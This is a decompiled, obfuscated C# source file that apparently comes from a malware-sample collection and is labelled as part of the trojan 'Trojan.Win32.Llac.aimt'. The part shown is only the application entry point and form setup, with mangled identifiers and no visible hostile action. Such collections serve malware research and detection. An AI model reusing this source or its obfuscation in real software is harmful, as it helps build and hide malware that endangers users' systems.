MalwareSourceCode/MSIL/Trojan/Win32/L/Trojan.Win32.Llac.aimt-d60eebfa06f055ff7e8bef8d4507b58d2922f6e9f6682bbf0d9c0884bab4acb2/_0004/_0003.cs

49 lines
1.6 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Stub, Version=2.0.0.2, Culture=neutral, PublicKeyToken=null
// MVID: 18A6455A-DBC9-4D4B-8699-BEBEFCABEF8D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Llac.aimt-d60eebfa06f055ff7e8bef8d4507b58d2922f6e9f6682bbf0d9c0884bab4acb2.exe
using \u0005;
using Microsoft.VisualBasic.ApplicationServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace \u0004
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal sealed class \u0003 : WindowsFormsApplicationBase
{
[EditorBrowsable(EditorBrowsableState.Advanced)]
[STAThread]
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
internal static void \u0002([In] string[] obj0)
{
try
{
Application.SetCompatibleTextRenderingDefault(\u001B\u0003.\u0001\u0004());
}
finally
{
}
\u0019\u0003.\u007E\u009E\u0003((object) \u0001.\u0002(), obj0);
}
public \u0003()
: base(AuthenticationMode.Windows)
{
\u001C\u0003.\u007E\u0006\u0004((object) this, false);
\u001C\u0003.\u007E\u0005\u0004((object) this, true);
\u001C\u0003.\u007E\u0003\u0004((object) this, true);
\u001D\u0003.\u007E\u0004\u0004((object) this, ShutdownMode.AfterMainFormCloses);
}
protected override void OnCreateMainForm() => this.MainForm = (Form) \u0001.\u0002().\u0002();
}
}